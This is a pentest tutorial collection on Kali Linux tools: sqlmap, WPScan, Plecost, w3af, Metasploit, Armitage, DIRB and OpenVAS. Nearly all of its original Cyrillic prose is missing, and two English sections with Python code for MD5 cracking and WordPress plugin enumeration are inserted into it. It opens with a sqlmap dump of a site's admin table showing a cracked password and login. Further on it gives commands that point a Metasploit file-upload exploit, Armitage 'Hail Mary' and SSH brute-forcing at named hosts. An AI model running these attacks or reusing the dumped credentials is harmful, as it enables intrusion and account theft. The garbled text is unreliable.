[2] custom dictionary file ( )
[3] file with list of dictionary files ( )
Enter.
, , do you want to use common password suffixes?
(slow!). , . ,
.
. .
:
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:00:41] [INFO] using hash method 'md5_generic_passwd'
[20:00:41] [INFO] resuming password 'nuvolari' for hash '493ccdcab464cff215467d4c62a7f142'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[20:00:45] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[20:00:49] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:01:05] [INFO] postprocessing table dump
Database: laminat
Table: admin
[2 entries]
+----+---------------+-----------------------------------------------------+-------+--------+
| id | jmeno         | heslo                                               | login | stupen |
+----+---------------+-----------------------------------------------------+-------+--------+
| 1  | M?la          | 493ccdcab464cff215467d4c62a7f142 (nuvolari)         | fucek | 1      |
| 4  | Administr?tor | d41d8cd98f00b204e9800998ecf8427e                    | admin | 1      |
+----+---------------+-----------------------------------------------------+-------+--------+
, !
.
. .
.
,
, .
, ,

( https://ru.wikipedia.org/wiki/_ ) ,
, . .
,
.
, ,
MD5, phpBB, MySQL SHA1 Hashcat Kali.
.


. -,
.
, - ,
. , , , , ,
, , ,
, ,
!
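The dump above stores passwords as unsalted MD5 (sqlmap's md5_generic_passwd), so a dictionary attack is just hashing candidates and comparing. Note also the second row: d41d8cd98f00b204e9800998ecf8427e is the MD5 of the empty string, so the admin account in that table has no password at all. The following is an added example written for this page, not sqlmap's own cracker: it reproduces the two things sqlmap asked about, a wordlist pass and the optional "common password suffixes" pass, and checks for the empty-password hash first. The wordlist and suffix list are constructed and tiny; sqlmap's wordlist.zip and suffix set are far larger.

```python
import hashlib
import itertools


def md5_hex(text):
    """Unsalted MD5 hex digest, the form the lab's admin table stores."""
    return hashlib.md5(text.encode()).hexdigest()


# Constructed wordlist and suffix list; sqlmap's own lists are much larger.
WORDLIST = ["password", "admin", "nuvolari", "letmein", "qwerty"]
COMMON_SUFFIXES = ["", "1", "12", "123", "!", "2015"]


def crack_md5(hashes, wordlist, suffixes=("",)):
    """Return {hash: plaintext} for every hash matched by word+suffix or by the empty string."""
    targets = {h.lower() for h in hashes}
    found = {}
    empty = md5_hex("")          # d41d8cd98f00b204e9800998ecf8427e: an account with no password
    if empty in targets:
        found[empty] = ""
    for word, suffix in itertools.product(wordlist, suffixes):
        if targets <= set(found):   # everything cracked, stop early
            break
        candidate = word + suffix
        digest = md5_hex(candidate)
        if digest in targets and digest not in found:
            found[digest] = candidate
    return found


def report(hashes, found):
    """One line per hash, like sqlmap's dump column: hash (plaintext), or the hash alone."""
    lines = []
    for h in hashes:
        h = h.lower()
        if h in found:
            shown = found[h] if found[h] != "" else "<empty password>"
            lines.append(f"{h} ({shown})")
        else:
            lines.append(h)
    return lines


if __name__ == "__main__":
    sample = [md5_hex("nuvolari"), "d41d8cd98f00b204e9800998ecf8427e", md5_hex("admin123")]
    for line in report(sample, crack_md5(sample, WORDLIST, COMMON_SUFFIXES)):
        print(line)
```

The suffix pass multiplies the work by the number of suffixes, which is why sqlmap marks it "(slow!)"; with a few hundred thousand words and a dozen suffixes it is still only millions of MD5 operations, which is the real lesson of the dump: unsalted fast hashes give an attacker the password list for the price of a coffee break.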

36. Firefox
Google Chrome " Chrome".
Dojo.
.
,
. .
, ,
, .
, -,
, ,
-.
( ).
: 2 (
- Firefox),

Firefox , .
.
, .
0. Firefox
, , ,
, ,
/ ( Chrome , -
).
.
Firefox, .
.
1. Cookies Manager+
Cookies Manager , ,
/.
(, , )
Add N Edit Cookies v0.2.1.3 goodwill.
Add N Edit Cookies:
()
,


,



,
, /


/ .
"expire",
"new date"
"Add cookie" ,
( )

2. Firebug
:
Firebug Firefox ,
, .

, CSS, HTML JavaScript



3. MM3-ProxySwitch

.
Proxy Switch
.

,
MM3 .
4. Selenium IDE
Selenium IDE Selenium.
Firefox ,
. Selenium IDE Selenium Core,
,
.
Selenium IDE , IDE.
,
.
, Selenium IDE Selenium,
.
http://docs.seleniumhq.org/download/,
Selenium IDE ( !), Firefox
.
:
Selenium IDE Button
Selenium IDE SelBlocks
Selenium IDE: PHP Formatters
5. SQL Inject Me
, .
: https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/.
.
SQL-.
,
SQL-.
( ) ,
,
HTML .
6. Tamper Data
HTTP/HTTPS. Tamper Data
HTTP/HTTPS post.
7. User Agent Switcher



. ,
.
8. Web Developer
-.
9. XSS Me
. :
https://addons.mozilla.org/en-us/firefox/addon/xss-me
(XSS) -
. XSS -
. XSS
- .
XSS-Me XSS .
: HTML ,
XSS . HTML
JavaScript ( document.vulnerable=true),
XSS.
10. HackBar
, Dojo, - .
SQL-.
SQL-, XSS .
:
(url)
, url
(Ctrl+Enter) / .
url .

uu/url .
.
MD5/SHA1/SHA256
MySQL/MS SQL Server/Oracle
XSS
.
:
url ( Alt + A )
url ( Alt + S )
( Alt + X, Ctrl + Enter )

INT -1 ( Alt )
INT +1 ( Alt + )
HEX -1 ( Ctrl Alt )
HEX +1 ( Ctrl + Alt + )
MD5 Hash ( Alt + M )
MySQL CHAR() ( Alt + Y )
MS SQL Server CHAR() ( Alt + Q )

37. WordPress: WPScanner


Plecost
, . WebWare.biz
, ,
. . , WebWare.biz, ,
: ,
. ,
:
, -.
(
, ). ,
.
Kali Linux, , ,
Kali Linux ( , ).
WordPress .
. WordPress
, ,
(!).
WordPress .
WordPress Security Scanner
WordPress. :
;
;
;
robots.txt;
WordPress, ,
.
, . ( ):
wpscan --update

( ), .
WordPress Security Scanner


update : .
url -u < url> : URL / WordPress .
force -f : WPScan ,
WordPress ( , WordPress,
).
enumerate -e [()] : (
).
:
u : id 1 10
u[10-20] : id 10 20 ( []
)
p :
vp : , ,
ap : ( )
tt : timthumbs
t :
vt : , ,
at : ( ).
, -e p,vt
. ,
"vt,tt,u,vp".
, ,
. :
wpscan -h

:
wpscan -u webware.biz -e p,vt

.. wpscan, -u
-. -e (
).
,
( ).
, WordPress,
, :

WordPress .
:
/proxy/admin.php, Glype;
, . .
, wp-content/plugins/wordpress-backup-to-dropbox/. ,
,
,
. ,
VPS ( ,
).
Plecost
WordPress .
, ( ,
).
, , .
, . .
, .
: , Plecost 1.0.1
WordPress.

-i, .
, .
Kali Linux /usr/share/plecost/wp_plugin_list.txt (
).
plecost -i /usr/share/plecost/wp_plugin_list.txt,
. :
plecost -i /usr/share/plecost/wp_plugin_list.txt webware.biz
( ):

, , Metasploit Framework
searchsploit, The Exploit Database .
: WPScan Vulnerability Database (
WordPress) Packet Storm ( ).
( WordPress)
1. WordPress (
-).
2. , ,
WordPress, (
-) , ,
. .. - ,
, .
3. WordPress:
,
. .

WordPress. , , , "" .
: ) , ; )
.
4.
( 30 , ).
-
( ). ,
.
5. ! Kali Linux ! ,
. , Kali Linux,
Linux. ,
.
, ,
, . ..

, - , , , .
, ( )
,
. , ,
,
. .., ,
(
), "" ,
, .

38. Plecost 1.0.1


WordPress
Kali.Tools

Plecost ( WordPress: WPScanner


Plecost). , , WordPress,

,
.
Plecost ,
1.0.1.
Plecost 1.0.1:
.
: .
CVE : Plecost
NIST SQLite
WordPress .
WordPress: Plecost WordPress
( ).
.
wordpress .
CHANGELOG.
Plecost 1.0.1
Kali Linux Plecost . : Kali
, .
LMDE 2 ( Debian, Mint, Ubuntu).
sudo apt-get install python3-pip python3-dev python3-wheel
sudo python3 -m pip install plecost

Plecost 1.0.1

:
plecost http://SITE.com
:
JSON XML:
JSON
plecost -v http://SITE.com -o results.json
XML
plecost -v http://SITE.com -o results.xml

Plecost 1.0.1
WordPress, :
plecost -nc http://SITE.com
, WordPress:
plecost -f http://SITE.com
:
plecost -nb http://SITE.com
wordlists:
mial@mint ~ $ plecost -nb -l
// Plecost - WordPress finger printer Tool - v1.0.0
Available word lists:
1 - plugin_list_50.txt
2 - plugin_list_1000.txt
3 - plugin_list_100.txt
4 - plugin_list_250.txt
6 - plugin_list_huge.txt
7 - plugin_list_10.txt
mial@mint ~ $
wordlist :
plecost -nb -w plugin_list_10.txt http://SITE.com
( ,
-!)
plecost --concurrency 10 http://SITE.com
:
plecost -c 10 http://SITE.com
help:
plecost -h

Plecost
,
:
:
sudo plecost --update-cve
:
sudo plecost --update-plugins


:
mial@mint ~ $ plecost -nb --show-plugins
// Plecost - WordPress finger printer Tool - v1.0.0
[*] Plugins with vulnerabilities known:
{ 0 } - ab_google_map_travel
{ 1 } - acobot_live_chat_%26_contact_form
{ 2 } - activehelper_livehelp_live_chat
{ 3 } - ad-manager
{ 4 } - alipay
{ 5 } - all-video-gallery
{ 6 } - all_in_one_seo_pack
{ 7 } - all_in_one_wordpress_security_and_firewall
{ 8 } - another_wordpress_classifieds_plugin
{ 9 } - anyfont
{ 10 } - april%27s_super_functions_pack
{ 11 } - audio_player
{ 12 } - banner_effect_header
{ 13 } - bannerman
{ 14 } - bib2html
{ 15 } - bic_media_widget
{ 16 } - bird_feeder
{ 17 } - blogstand-smart-banner
{ 18 } - blue_wrench_video_widget
{ 19 } - bookx
{ 20 } - bradesco_gateway
{ 21 } - bsk_pdf_manager
{ 22 } - bulletproof-security
{ 23 } - bulletproof_security
{ 24 } - cakifo
:
plecost -nb -vp google_analytics
CVE:
plecost -nb --cve CVE-2014-9174
? - WordPress.
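Both WPScan's -e p and Plecost's wordlist mode (-i in the old version, -w in 1.0.1) find plugins the same way: request /wp-content/plugins/<slug>/readme.txt for every slug in a list, read the version from the Stable tag line, and compare it with a database of known issues. The following is an added example written for this page, not code from WPScan or Plecost. The site it scans is a constructed dictionary standing in for HTTP responses, the plugin slugs apart from the wordlist shape are made up, and the "fixed in" table is invented for the demonstration and says nothing about any real plugin.

```python
import re

# Constructed stand-in for a WordPress site: request path -> (status, body). Not a real site.
FAKE_SITE = {
    "/wp-content/plugins/sample-seo/readme.txt": (200, "=== Sample SEO ===\nStable tag: 3.1.1\n"),
    "/wp-content/plugins/sample-gallery/readme.txt": (200, "=== Sample Gallery ===\nStable tag: 1.2\n"),
    "/wp-content/plugins/sample-forms/": (403, "Forbidden"),   # directory present, listing denied
}


def fake_fetch(path):
    """Stands in for an HTTP GET; for a live scan swap in requests.get(base_url + path)."""
    return FAKE_SITE.get(path, (404, "Not Found"))


STABLE_TAG = re.compile(r"^Stable tag:\s*([\d.]+)", re.IGNORECASE | re.MULTILINE)


def enumerate_plugins(fetch, wordlist):
    """Return {slug: version-or-None} for every slug that answers under /wp-content/plugins/."""
    found = {}
    for slug in wordlist:
        base = f"/wp-content/plugins/{slug}/"
        status, body = fetch(base + "readme.txt")
        if status == 200:
            m = STABLE_TAG.search(body)
            found[slug] = m.group(1) if m else None
            continue
        status, _ = fetch(base)
        if status in (200, 403):      # a 403 on the directory still proves the plugin is installed
            found[slug] = None
    return found


def parse_version(v):
    """'1.10' must sort after '1.9', so compare numerically, not as strings."""
    return tuple(int(x) for x in v.split("."))


def flag_outdated(found, fixed_in):
    """fixed_in maps slug -> first version without a known issue (a constructed table here)."""
    out = {}
    for slug, ver in found.items():
        if slug not in fixed_in:
            continue
        if ver is None:
            out[slug] = "version unknown, check manually"
        elif parse_version(ver) < parse_version(fixed_in[slug]):
            out[slug] = f"{ver} < {fixed_in[slug]}"
    return out


# Constructed wordlist and advisory table for the demonstration only.
WORDLIST = ["sample-seo", "sample-gallery", "sample-forms", "not-installed"]
FIXED_IN = {"sample-gallery": "1.4", "sample-forms": "2.0", "sample-seo": "3.0"}

if __name__ == "__main__":
    found = enumerate_plugins(fake_fetch, WORDLIST)
    print(found)
    print(flag_outdated(found, FIXED_IN))
```

The 403 case is the one worth remembering from the defender's side: denying directory listings (point 3 of the hardening list above) hides the contents but not the existence of the directory, so a scanner still learns the plugin is there. Blocking direct requests to readme.txt and the plugin directories removes the version as well, which is what the text means by not letting a scanner see the plugin list.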

39. W3af Kali Linux


http://pentesterconfessions.blogspot.ru/2007/10/how-to-
use-w3af-to-audit-web.html w3af.
Entest, , !

W3af (Web Application Attack and Audit Framework) open-source -


.
, -
. , .
-
XSS, CSRF Sqli w3af .
W3af
W3af :
w3af_console
:
w3af>>> help
:
start .
plugins .
exploit .
profiles .
cleanup .

help . : help [] , ""
version w3af.
keys .

http-settings HTTP
misc-settings w3af.
target URL.

back
exit w3af.

kb , .

w3af .
,
"back".
"view"
.
"target". URL .
:
w3af>>> target
w3af/config:target>>> help

:
view
set
save

back
exit w3af

URL :
w3af/config:target>>> set target http://localhost
w3af/config:target>>> view

:
w3af/config:target>>> back
w3af>>> plugins
w3af/plugins>>> help

list

back
exit w3af

grep , grep
audit ,
evasion ,
crawl ,
auth ,
mangle ,
output ,
bruteforce ,
infrastructure ,

- .
Audit, crawl, infrastructure output.
audit, ,
xss, csrf, sql ldap ..
.
:
w3af/plugins>>> audit xss,csrf,sqli

:
w3af/plugins>>> audit all

- .
html.
crawl output:
w3af/plugins>>> crawl web_spider,pykto
w3af/plugins>>> infrastructure hmap
w3af/plugins>>> output console,html_file

:
Web_spider web-.
.

Pykto nikto, python.


nikto (scan_database) .
Hmap -, ,
.
"Server".
hmap Dustin`a Lee.
Console .
Html_file HTML-.
:
w3af/plugins>>> back
w3af>>> start

, .
:
w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
Auto-enabling plugin: discovery.error404page
Auto-enabling plugin: discovery.serverHeader
The Server header for this HTTP server is: Apache/2.2.3 (Ubuntu) PHP/5.2.1
Hmap plugin is starting. Fingerprinting may take a while.
The most accurate fingerprint for this HTTP server is: Apache/2.0.55 (Ubuntu) PHP/5.1.2
pykto plugin is using "Apache/2.0.55 (Ubuntu) PHP/5.1.2" as the remote server type. This information was obtained by hmap plugin.
pykto plugin found a vulnerability at URL: http://localhost/icons/ . Vulnerability description: Directory indexing is enabled, it should only be enabled for specific directories (if required). If indexing is not used, the /icons directory should be removed. The vulnerability was found in the request with id 128.
pykto plugin found a vulnerability at URL: http://localhost/doc/ . Vulnerability description: The /doc directory is browsable. This may be /usr/doc. The vulnerability was found in the request with id 1865.
pykto plugin found a vulnerability at URL: http://localhost/\> . Vulnerability description: The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS). CA-2000-02. The vulnerability was found in the request with id 3385.
New URL found by discovery: http://localhost/
New URL found by discovery: http://localhost/test2.html
New URL found by discovery: http://localhost/xst2.html
New URL found by discovery: http://localhost/xst.html
New URL found by discovery: http://localhost/test.html

, results.html:

40. ZAProxy:
-
OWASP Zed Attack Proxy (ZAP)
-
.
,
,
.
.
ZAP:

AJAX




SSL
(Smartcard Client
Digital Certificates)
-

REST API


ZAP:

-
( Java 1.7)
( Pro )





ZAProxy
.
zaproxy

. .

( )

,
. ,
: ( SQL-
XSS). .

,
"":


, , .

41. Metasploit Framework Kali Linux 2.0


Kali Linux 2.0
- https://www.kali.org/releases/kali-linux-20-released/

Black Hat DEF CON,
Kali Linux Dojo, .
, Dojo
Kali 2.0 ISO .
.
Kali 2013. , Kali 2.0 .
Kali 2.0? 4.0, Debian Jessie,
,
(gnome, kde, xfce, mate, e17, lxde, i3wm),
.
,
. ?
, .
Kali Linux -
, -, ( ).

, Kali 2.0
, Kali
. , Debian
Testing ( , )
Kali,
Debian, .
, Debian
Debian, .
,

, ,
( git).
,
. ,
.
,
-.
Kali Linux 2.0
Live Build, Kali 2.0 KDE,
GNOME3, Xfce, MATE, e17, lxde i3wm. GNOME 3 ,
.
GNOME 3,
. ,
, gnome.
,
GNOME 768 MB. ,
.
Kali 2.0 ISO. Kali
Xfce
.
Kali Linux 2.0 ARM NetHunter 2.0
ARM Kali 2.0 Raspberry Pi,
Chromebooks, Odroids !
, Chromebook Flip
. , .
, ARM
.

NetHunter,
, Kali 2.0.
NetHunter 5, 6, 7, 9 10. OnePlus
One NetHunter Kali 2.0,
CM12 Offensive Security NetHunter
.
VMware VirtualBox
Offensive Security,
, Kali Linux,
VMware VirtualBox Kali 2.0 , Kali
. 32 64
Kali GNOME 3.

,
,
.
TL;DR. Kali 2.0?
Kali 1.0 , Kali 2.0

. , Kali Linux 2.0

Kali Linux 2.0, .
, Kali Linux !
TL; DR. Kali 2.0?
, Kali 1.x Kali 2.0!
source.list dist-upgrade .
Kali
Kali apt, Kali
2.0 . lazykali.sh, PTF
git . .
, ,
. - ,
.

:
cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
EOF

apt-get update
apt-get dist-upgrade # 10.
reboot

Metasploit Community / Pro Kali


Rapid7, Metasploit Community / Pro Kali Linux
metasploit-framework. ,
Community Pro, Rapid7,
, .
, Rapid7 Metasploit Kali,

() ,
, Metasploit
, Kali
metasploit-framework. ,
Metasploit.
, Metasploit Framework
Kali.
Metasploit Framework Kali Linux 2.0
- metasploit-framework,
, Metasploit Kali ,
metasploit. Metasploit Framework
Kali Linux 2.0:
# Postgresql Database
/etc/init.d/postgresql start

# Metasploit Framework
msfdb init

# msfconsole
msfconsole

Kali 2.0 ,
Kali Linux 2.0 ,
. , ,
.
Kali 2.0:

42. Metasploit Framework Kali Linux 1.1


Metasploit Exploitation Framework
. ,
Metasploit. Metasploit,
.
searchsploit . ,
, , Metasploit.
.
, . ,
, ,
,
.
, , .
Kali Linux . , ,
:
Metasploit Framework Kali Linux
Kali Linux:

Kali Linux, ,
Linux.
searchsploit
.
, :
searchsploit -h

5 :
-c .
-v , .
, .
searchsploit ( ), :
searchsploit phpmyadmin

searchsploit wordpress

, . ( ),
, . .
: : .c, .pl, .txt,
.sh, .php, .rb, .py, .zip, .java, .asm, .htm .
.txt
. , , :

, , ,
. .

.rb Ruby, :
ruby + + .
:
ruby /usr/share/exploitdb/platforms/php/webapps/28126.rb

.rb Metasploit.
-, :
require 'msf/core'
Metasploit

.c .
.php . Ruby
, PHP
(
, ).
:
php /usr/share/exploitdb/platforms/php/webapps/35413.php webware.biz Alexey 50

.pl Perl, , ,
perl. ( )
PHP.
, .
. Metasploit.
Metasploit
Metasploit .
10 . Metasploit
Framework. - , :

- ,
. :
msf > db_rebuild_cache

search + + . :
msf > search wordpress

, , .
: ,
, ( ),
.
, WordPress , . .
.
, , :
exploit/unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent WordPress Download Manager (download-manager) Unauthenticated File Upload

exploit/unix/webapp/wp_downloadmanager_upload
use :
msf > use exploit/unix/webapp/wp_downloadmanager_upload
, :

:
show options
( ).

, .
set
:
set RHOST webware.biz

.
TARGETURI. , , phpMyAdmin,
phpmyadmin ,
.
:
exploit

, .

, , ,
, . .
nmap. :
msf > nmap 10.0.2.2

msf > nmap webware.biz

, , , ,
.
" Kali Linux 1.0.9a. 2.
".

, :
- (phpMyAdmin, WordPress, Drupal . .)
.
. ,
-. ,
.
- , : )
, , ; )
, ,
.

43. DIRB: -
Kali.Tools
-
( , ,
-). , - ,
- ,
..
DIRB -. (, ) -
. , -
.
DIRB
, .
DIRB CGI , ,
, .
DIRB -.
. ,
-. DIRB -
, CGI . -
, .
,

DIRB
dirb <_> [<()_>] []

<_> : URL . ( -resume )
<()_> : . (1,2,3)
DIRB
'n' -> .
'q' -> . ( )
'r' -> Remaining scan stats.
DIRB
-a <_> : USER_AGENT.
-c <_> : HTTP .
-f : NOT_FOUND (404).
-H <_> : HTTP .
-i : .
-l : "Location" .
-N <nf_code>: HTTP .
-o <__> : .
-p <[:]> : . ( 1080)
-P <proxy_username:proxy_password> : .
-r : .
-R : . ( )
-S : . . ( )
-t : '/' URL.
-u <:> : HTTP .
-v : NOT_FOUND.
-w : WARNING.
-X <> / -x <_> :
.
-z <> : , ,
.
DIRB
dirb http://url/directory/ ( )
dirb http://url/ -X .html ( '.html')
dirb http://url/ /usr/share/dirb/wordlists/vulns/apache.txt (
apache.txt)
dirb https://secure_url/ ( SSL)
DIRB
root@WebWare:~# tree /usr/share/wordlists/dirb*
/usr/share/wordlists/dirb
    big.txt
    catala.txt
    common.txt
    euskera.txt
    extensions_common.txt
    indexes.txt
    mutations_common.txt
    others
        best1050.txt
        best110.txt
        best15.txt
        names.txt
    small.txt
    spanish.txt
    stress
        alphanum_case_extra.txt
        alphanum_case.txt
        char.txt
        doble_uri_hex.txt
        test_ext.txt
        unicode.txt
        uri_hex.txt
    vulns
        apache.txt
        axis.txt
        cgis.txt
        coldfusion.txt
        domino.txt
        fatwire_pagenames.txt
        fatwire.txt
        frontpage.txt
        hpsmh.txt
        hyperion.txt
        iis.txt
        iplanet.txt
        jboss.txt
        jersey.txt
        jrun.txt
        netware.txt
        oracle.txt
        ror.txt
        sap.txt
        sharepoint.txt
        sunas.txt
        tests.txt
        tomcat.txt
        vignette.txt
        weblogic.txt
        websphere.txt
/usr/share/wordlists/dirbuster
    apache-user-enum-1.0.txt
    apache-user-enum-2.0.txt
    directories.jbrofuzz
    directory-list-1.0.txt
    directory-list-2.3-medium.txt
    directory-list-2.3-small.txt
    directory-list-lowercase-2.3-medium.txt
    directory-list-lowercase-2.3-small.txt

3 directories, 54 files

DIRB



File | Path | Lines | Note
big.txt | /usr/share/wordlists/dirb/big.txt | 20469 |
catala.txt | /usr/share/wordlists/dirb/catala.txt | 161 |
common.txt | /usr/share/wordlists/dirb/common.txt | 4614 |
euskera.txt | /usr/share/wordlists/dirb/euskera.txt | 197 |
extensions_common.txt | /usr/share/wordlists/dirb/extensions_common.txt | 29 |
indexes.txt | /usr/share/wordlists/dirb/indexes.txt | 10 |
mutations_common.txt | /usr/share/wordlists/dirb/mutations_common.txt | 49 |
best1050.txt | /usr/share/wordlists/dirb/others/best1050.txt | 1049 |
best110.txt | /usr/share/wordlists/dirb/others/best110.txt | 110 |
best15.txt | /usr/share/wordlists/dirb/others/best15.txt | 15 |
names.txt | /usr/share/wordlists/dirb/others/names.txt | 8607 |
small.txt | /usr/share/wordlists/dirb/small.txt | 959 |
spanish.txt | /usr/share/wordlists/dirb/spanish.txt | 449 |
alphanum_case_extra.txt | /usr/share/wordlists/dirb/stress/alphanum_case_extra.txt | 95 |
alphanum_case.txt | /usr/share/wordlists/dirb/stress/alphanum_case.txt | 62 |
char.txt | /usr/share/wordlists/dirb/stress/char.txt | 26 |
doble_uri_hex.txt | /usr/share/wordlists/dirb/stress/doble_uri_hex.txt | 256 |
test_ext.txt | /usr/share/wordlists/dirb/stress/test_ext.txt | 17576 |
unicode.txt | /usr/share/wordlists/dirb/stress/unicode.txt | 65536 |
uri_hex.txt | /usr/share/wordlists/dirb/stress/uri_hex.txt | 256 |
apache.txt | /usr/share/wordlists/dirb/vulns/apache.txt | 30 | Apache
axis.txt | /usr/share/wordlists/dirb/vulns/axis.txt | 17 |
cgis.txt | /usr/share/wordlists/dirb/vulns/cgis.txt | 3494 |
coldfusion.txt | /usr/share/wordlists/dirb/vulns/coldfusion.txt | 21 |
domino.txt | /usr/share/wordlists/dirb/vulns/domino.txt | 291 |
fatwire_pagenames.txt | /usr/share/wordlists/dirb/vulns/fatwire_pagenames.txt | 2711 |
fatwire.txt | /usr/share/wordlists/dirb/vulns/fatwire.txt | 101 |
frontpage.txt | /usr/share/wordlists/dirb/vulns/frontpage.txt | 43 |
hpsmh.txt | /usr/share/wordlists/dirb/vulns/hpsmh.txt | 238 |
hyperion.txt | /usr/share/wordlists/dirb/vulns/hyperion.txt | 579 |
iis.txt | /usr/share/wordlists/dirb/vulns/iis.txt | 59 | IIS
iplanet.txt | /usr/share/wordlists/dirb/vulns/iplanet.txt | 36 |
jboss.txt | /usr/share/wordlists/dirb/vulns/jboss.txt | 19 |
jersey.txt | /usr/share/wordlists/dirb/vulns/jersey.txt | 129 |
jrun.txt | /usr/share/wordlists/dirb/vulns/jrun.txt | 13 |
netware.txt | /usr/share/wordlists/dirb/vulns/netware.txt | 60 |
oracle.txt | /usr/share/wordlists/dirb/vulns/oracle.txt | 1075 | Oracle
ror.txt | /usr/share/wordlists/dirb/vulns/ror.txt | 121 |
sap.txt | /usr/share/wordlists/dirb/vulns/sap.txt | 1111 |
sharepoint.txt | /usr/share/wordlists/dirb/vulns/sharepoint.txt | 1708 |
sunas.txt | /usr/share/wordlists/dirb/vulns/sunas.txt | 52 |
tests.txt | /usr/share/wordlists/dirb/vulns/tests.txt | 34 |
tomcat.txt | /usr/share/wordlists/dirb/vulns/tomcat.txt | 87 | Tomcat
vignette.txt | /usr/share/wordlists/dirb/vulns/vignette.txt | 74 |
weblogic.txt | /usr/share/wordlists/dirb/vulns/weblogic.txt | 361 |
websphere.txt | /usr/share/wordlists/dirb/vulns/websphere.txt | 560 |
apache-user-enum-1.0.txt | /usr/share/wordlists/dirbuster/apache-user-enum-1.0.txt | 8930 | Apache 1.0
apache-user-enum-2.0.txt | /usr/share/wordlists/dirbuster/apache-user-enum-2.0.txt | 10355 | Apache 2.0
directories.jbrofuzz | /usr/share/wordlists/dirbuster/directories.jbrofuzz | 58688 |
directory-list-1.0.txt | /usr/share/wordlists/dirbuster/directory-list-1.0.txt | 141708 |
directory-list-2.3-medium.txt | /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | 220560 |
directory-list-2.3-small.txt | /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt | 87664 |
directory-list-lowercase-2.3-medium.txt | /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt | 207643 |
directory-list-lowercase-2.3-small.txt | /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt | 81643 |


44. Kali Linux


.
:

SQL- ( ,
,
)
(
SQL-,
)
Linux .
, , , , ,
DIRB .
. DIRB
DIRB: -.
:
dirb <_> [<()_>] []

. ,
.

Windows AdminPage DW Admin and Login Finder v1.1 (


,
).
DIRB. ,
() .
1925 . .
. :
dirb http://example.com admin_webware2.txt

6.

45. OpenVAS 8.0
.

.
Kali Linux
OpenVAS 8.0 Kali Linux.
,
, OpenVAS 8.0 .
Kali
, , Kali
OpenVAS. , openvas-setup
OpenVAS, , admin
.
, .
root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade

root@kali:~# apt-get install openvas
root@kali:~# openvas-setup
/var/lib/openvas/private/CA created
/var/lib/openvas/CA created

[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.
[i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed
...
sent 1143 bytes received 681741238 bytes 1736923.26 bytes/sec
total size is 681654050 speedup is 1.00
[i] Initializing scap database
[i] Updating CPEs
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2002.xml
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2003.xml
...
Write out database with 1 new entries
Data Base Updated
Restarting Greenbone Security Assistant: gsad.
User created with password '6062d074-0a4c-4de1-a26a-5f9f055b7c88'.

, . - ,
. - ,
,
.
. openvas-setup , OpenVAS
manager, GSAD :
root@kali:~# netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:9390 0.0.0.0:* LISTEN 9390/openvasmd
tcp 0 0 127.0.0.1:9391 0.0.0.0:* LISTEN 9391/openvassd: Wai
tcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 9392/gsad

- OpenVAS
https://127.0.0.1:9392,
SSL admin.
. (
,
), .
:
openvasmd --get-users

:
openvasmd --user=admin --new-password=1

, admin, , ,
. , , .
:
openvasmd --create-user=mial


:
openvas-start

! OpenVAS IP
, . !

46. Armitage:
Kali Linux
Armitage
Armitage , , Metasploit, Nmap.
Armitage -

.
Armitage .
: ,
(, , . .)
. ,
,
, . .
.. Armitage , . .
Armitage
Armitage, , .
:
3
Java 8.
Java 8 (JDK 8u45) . . :
openjdk Armitage
. , .
Armitage
PostgreSQL Metasploit
Kali 2.0
/etc/init.d/postgresql start && msfdb init

Kali 1.x
service postgresql start && service metasploit start

Armitage:
armitage

.
, Metasploit.

, Connect.

Yes. .
, , , 2
. .
, .
, ,
:

( , )

Armitage
IP . , IP
nmap:
nmap webware.biz

webware.biz .

,
IP 185.26.122.50.
Armitage Hosts Add Hosts.
IP:

Scan.
, , .
.

( , )

, Hosts Nmap Scan


Quick Scan (OS detect).
.
Attacks Find Attacks.

( , )

Attack.
.
.. check exploits.

( , )
The target is not exploitable. ,
. This module does not support check. ,
. .. , .
:

Attacks Hail Mary.


. ,
. , ,
.
Armitage Metasploit
Armitage Metasploit. ,
ssh, ftp, MySQL ,
. , . ,
login. . ,
SSH. auxiliary/scanner/ssh/ssh_login
:

. , USER_FILE
. PASS_FILE
.
Metasploit
:
ls -l /usr/share/metasploit-framework/data/wordlists/

, Hydra ,
,

Armitage ( )
Armitage Java : 1
. -
Java . Java ,
NetBeans, JDownloader, Vuse .
Metasploit (
+ )
Armitage .
Armitage,
Metasploit . .. -
,
- ,
, , .
: , ? !
,
, Armitage
.

47. Linux (rootkits)


rkhunter
(rootkit) ,
, .
,
, ,
, - .
Linux ,
.
Rootkit Hunter (rkhunter). ,
Linux rkhunter.
rkhunter Linux
rkhunter Debian, Ubuntu Linux Mint:
$ sudo apt-get install rkhunter

rkhunter Fedora:
$ sudo yum install rkhunter

rkhunter CentOS RHEL Repoforge


, yum:
$ sudo yum install rkhunter

Linux

:
$ sudo rkhunter -c

rkhunter , , :
SHA-1
, .
, .
, , -
.
,
xinetd.
.
.
.
.
.
Rootkit Hunter .

, rkhunter /var/log/rkhunter.log.
:
$ sudo grep Warning /var/log/rkhunter.log

[21:33:23] Checking /dev for suspicious file types [ Warning ]
[21:33:23] Warning: Suspicious file types found in /dev:
[21:33:23] Checking for hidden files and directories [ Warning ]
